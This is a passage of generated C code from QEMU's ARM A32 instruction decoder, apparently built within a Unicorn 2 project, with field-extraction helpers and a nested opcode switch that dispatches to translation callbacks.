4, 28, extract32(insn, 8, 12)); } static void disas_a32_extract_ldrex(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = 0; a->rt2 = 15; } static void disas_a32_extract_ldst_ri12_p0w1(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_ri12_p1w(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 1; } static void disas_a32_extract_ldst_ri12_pw0(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_ri8_p0w1(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 4)); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_ri8_p1w(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 4)); a->p = 1; } static void disas_a32_extract_ldst_ri8_pw0(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 4)); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_rr_p0w1(DisasContext *ctx, 
arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 1; a->shimm = 0; a->shtype = 0; } static void disas_a32_extract_ldst_rr_p1w(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); a->p = 1; a->shimm = 0; a->shtype = 0; } static void disas_a32_extract_ldst_rr_pw0(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 0; a->shimm = 0; a->shtype = 0; } static void disas_a32_extract_ldst_rs_p0w1(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 7, 5); a->shtype = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 1; } static void disas_a32_extract_ldst_rs_p1w(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 7, 5); a->shtype = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->p = 1; } static void disas_a32_extract_ldst_rs_pw0(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 7, 5); a->shtype = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 0; } static void disas_a32_extract_mov16(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 12), 12, 20, extract32(insn, 16, 4)); } static void disas_a32_extract_msr_i(DisasContext *ctx, arg_msr_i *a, uint32_t insn) { a->mask = extract32(insn, 16, 4); a->rot = extract32(insn, 8, 4); a->imm = extract32(insn, 0, 8); } static void disas_a32_extract_rd0mn(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rd = extract32(insn, 16, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); a->ra = 0; } static void disas_a32_extract_rdamn(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rd = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_rdm(DisasContext *ctx, arg_rr *a, uint32_t insn) { a->rd = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_rdmn(DisasContext *ctx, arg_rrr *a, uint32_t insn) { a->rd = extract32(insn, 16, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_rm(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_rndm(DisasContext *ctx, arg_rrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_rrr_rot(DisasContext *ctx, arg_rrr_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rot = extract32(insn, 10, 2); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_s_rd0mn(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 16, 4); a->rm = extract32(insn, 8, 4); a->rn =
extract32(insn, 0, 4); a->ra = 0; } static void disas_a32_extract_s_rdamn(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_s_rri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->rot = times_2(ctx, extract32(insn, 8, 4)); } static void disas_a32_extract_s_rrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->shim = extract32(insn, 7, 5); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_s_rrr_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rs = extract32(insn, 8, 4); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_s_rxi_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->rot = times_2(ctx, extract32(insn, 8, 4)); a->rn = 0; } static void disas_a32_extract_s_rxr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 12, 4); a->shim = extract32(insn, 7, 5); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->rn = 0; } static void disas_a32_extract_s_rxr_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 12, 4); a->rs = extract32(insn, 8, 4); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->rn = 0; } static void disas_a32_extract_sat(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->satimm = extract32(insn, 16, 5); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 7, 5); a->sh = extract32(insn, 6, 1); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_sat16(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->satimm = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rn = extract32(insn, 0, 4); a->imm = 0; a->sh = 0; } static void disas_a32_extract_stl(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 0, 4); a->imm = 0; a->rt2 = 15; } static void disas_a32_extract_strex(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rt = extract32(insn, 0, 4); a->imm = 0; a->rt2 = 15; } static void disas_a32_extract_swp(DisasContext *ctx, arg_disas_a3226 *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 0, 4); } static bool disas_a32(DisasContext *ctx, uint32_t insn) { union { arg_bfi f_bfi; arg_bfx f_bfx; arg_disas_a3226 f_disas_a3226; arg_empty f_empty; arg_i f_i; arg_ldrex f_ldrex; arg_ldst_block f_ldst_block; arg_ldst_ri f_ldst_ri; arg_ldst_rr f_ldst_rr; arg_mrs_bank f_mrs_bank; arg_mrs_reg f_mrs_reg; arg_msr_bank f_msr_bank; arg_msr_i f_msr_i; arg_msr_reg f_msr_reg; arg_pkh f_pkh; arg_r f_r; arg_ri f_ri; arg_rr f_rr; arg_rrr f_rrr; arg_rrr_rot f_rrr_rot; arg_rrrr f_rrrr; arg_s_rri_rot f_s_rri_rot; arg_s_rrr_shi f_s_rrr_shi; arg_s_rrr_shr f_s_rrr_shr; arg_s_rrrr f_s_rrrr; arg_sat f_sat; arg_strex f_strex; } u; switch 
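/*
 * Generated decoder body: dispatch first on the A32 major opcode,
 * insn[27:25], then narrow with nested mask/switch tests until a
 * single pattern remains; each leaf extracts its fields into "u" and
 * hands them to the matching trans_* callback, which returns true
 * once the instruction has been translated. Illustrative walk, for
 * insn = 0xe0812002 (ADD r2, r1, r2): insn[27:25] = 000 -> case 0x0;
 * (insn & 0x01000010) == 0 -> s_rrr_shi extraction; insn[23:21] = 100
 * -> trans_ADD_rrri().
 */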
((insn >> 25) & 0x7) { case 0x0: /* ....000. ........ ........ ........ */ switch (insn & 0x01000010) { case 0x00000000: /* ....0000 ........ ........ ...0.... */ disas_a32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); switch ((insn >> 21) & 0x7) { case 0x0: /* ....0000 000..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:60 */ if (trans_AND_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* ....0000 001..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:61 */ if (trans_EOR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* ....0000 010..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:62 */ if (trans_SUB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* ....0000 011..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:63 */ if (trans_RSB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x4: /* ....0000 100..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:64 */ if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x5: /* ....0000 101..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:65 */ if (trans_ADC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x6: /* ....0000 110..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:66 */ if (trans_SBC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x7: /* ....0000 111..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:67 */ if (trans_RSC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x00000010: /* ....0000 ........ ........ ...1.... */ switch (insn & 0x00600080) { case 0x00000000: /* ....0000 .00..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 000..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:92 */ if (trans_AND_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 100..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:96 */ if (trans_ADD_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00000080: /* ....0000 .00..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .00..... ........ 1001.... */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 000..... ........ 1001.... */ disas_a32_extract_s_rd0mn(ctx, &u.f_s_rrrr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0000 000..... 0000.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:144 */ if (trans_MUL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 100..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:148 */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); if (trans_UMULL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .00..... ........ 1011.... 
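   (the generated bit-pattern comments read the instruction MSB-first,
    with '.' marking bits not yet constrained at this node; the 1011
    column here is the halfword load/store group)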
*/ disas_a32_extract_ldst_rr_pw0(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .000.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:249 */ if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .001.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:258 */ if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x2: /* ....0000 .00..... ........ 1101.... */ disas_a32_extract_ldst_rr_pw0(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .000.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:252 */ if (trans_LDRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .001.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:261 */ if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x3: /* ....0000 .00..... ........ 1111.... */ disas_a32_extract_ldst_rr_pw0(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .000.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:255 */ if (trans_STRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .001.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:264 */ if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; } return false; case 0x00200000: /* ....0000 .01..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 001..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:93 */ if (trans_EOR_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 101..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:97 */ if (trans_ADC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00200080: /* ....0000 .01..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .01..... ........ 1001.... */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 001..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:145 */ if (trans_MLA(ctx, &u.f_s_rrrr)) return true; return false; case 0x1: /* ....0000 101..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:149 */ if (trans_UMLAL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .01..... ........ 1011.... */ disas_a32_extract_ldst_rr_p0w1(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .010.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:272 */ if (trans_STRHT_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .011.... ....0000 1011.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:273 */ if (trans_LDRHT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x2: /* ....0000 .01..... ........ 1101.... */ disas_a32_extract_ldst_rr_p0w1(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00100000: /* ....0000 .011.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:274 */ if (trans_LDRSBT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x3: /* ....0000 .01..... ........ 1111.... */ disas_a32_extract_ldst_rr_p0w1(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00100000: /* ....0000 .011.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:275 */ if (trans_LDRSHT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; } return false; case 0x00400000: /* ....0000 .10..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 010..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:94 */ if (trans_SUB_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 110..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:98 */ if (trans_SBC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00400080: /* ....0000 .10..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .10..... ........ 1001.... */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 010..... ........ 1001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 0100.... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:146 */ if (trans_UMAAL(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 110..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:150 */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); if (trans_SMULL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .10..... ........ 1011.... */ disas_a32_extract_ldst_ri8_pw0(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .100.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:310 */ if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .101.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:319 */ if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x2: /* ....0000 .10..... ........ 1101.... */ disas_a32_extract_ldst_ri8_pw0(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .100.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:313 */ if (trans_LDRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .101.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:322 */ if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* ....0000 .10..... ........ 1111.... 
*/ disas_a32_extract_ldst_ri8_pw0(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .100.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:316 */ if (trans_STRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .101.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:325 */ if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; } return false; case 0x00600000: /* ....0000 .11..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 011..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:95 */ if (trans_RSB_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 111..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:99 */ if (trans_RSC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00600080: /* ....0000 .11..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .11..... ........ 1001.... */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 011..... ........ 1001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 0110.... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:147 */ if (trans_MLS(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 111..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:151 */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); if (trans_SMLAL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .11..... ........ 1011.... */ disas_a32_extract_ldst_ri8_p0w1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .110.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:333 */ if (trans_STRHT_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .111.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:334 */ if (trans_LDRHT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x2: /* ....0000 .11..... ........ 1101.... */ disas_a32_extract_ldst_ri8_p0w1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x1: /* ....0000 .111.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:335 */ if (trans_LDRSBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* ....0000 .11..... ........ 1111.... */ disas_a32_extract_ldst_ri8_p0w1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x1: /* ....0000 .111.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:336 */ if (trans_LDRSHT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; } return false; } return false; case 0x01000000: /* ....0001 ........ ........ ...0.... */ switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 0.0..... ........ ...0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0.00.... ........ ...0.... 
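   (miscellaneous group: MRS/MSR, CRC32 and the signed halfword
    multiply-accumulate forms are told apart below by insn[7:5])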
*/ switch ((insn >> 5) & 0x7) { case 0x0: /* ....0001 0.00.... ........ 0000.... */ switch (insn & 0x00000e0f) { case 0x00000000: /* ....0001 0.00.... ....000. 00000000 */ disas_a32_extract_disas_a32_Fmt_22(ctx, &u.f_mrs_reg, insn); switch (insn & 0x000f0100) { case 0x000f0000: /* ....0001 0.001111 ....0000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:226 */ if (trans_MRS_reg(ctx, &u.f_mrs_reg)) return true; return false; } return false; case 0x00000200: /* ....0001 0.00.... ....001. 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:223 */ disas_a32_extract_disas_a32_Fmt_20(ctx, &u.f_mrs_bank, insn); if (trans_MRS_bank(ctx, &u.f_mrs_bank)) return true; return false; } return false; case 0x2: /* ....0001 0.00.... ........ 0100.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00400f00) { case 0x00000000: /* ....0001 0000.... ....0000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:207 */ if (trans_CRC32B(ctx, &u.f_rrr)) return true; return false; case 0x00000200: /* ....0001 0000.... ....0010 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:210 */ if (trans_CRC32CB(ctx, &u.f_rrr)) return true; return false; case 0x00400000: /* ....0001 0100.... ....0000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:209 */ if (trans_CRC32W(ctx, &u.f_rrr)) return true; return false; case 0x00400200: /* ....0001 0100.... ....0010 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:212 */ if (trans_CRC32CW(ctx, &u.f_rrr)) return true; return false; } return false; case 0x4: /* ....0001 0.00.... ........ 1000.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:164 */ if (trans_SMLABB(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:172 */ if (trans_SMLALBB(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x5: /* ....0001 0.00.... ........ 1010.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:166 */ if (trans_SMLATB(ctx, &u.f_rrrr)) return true; 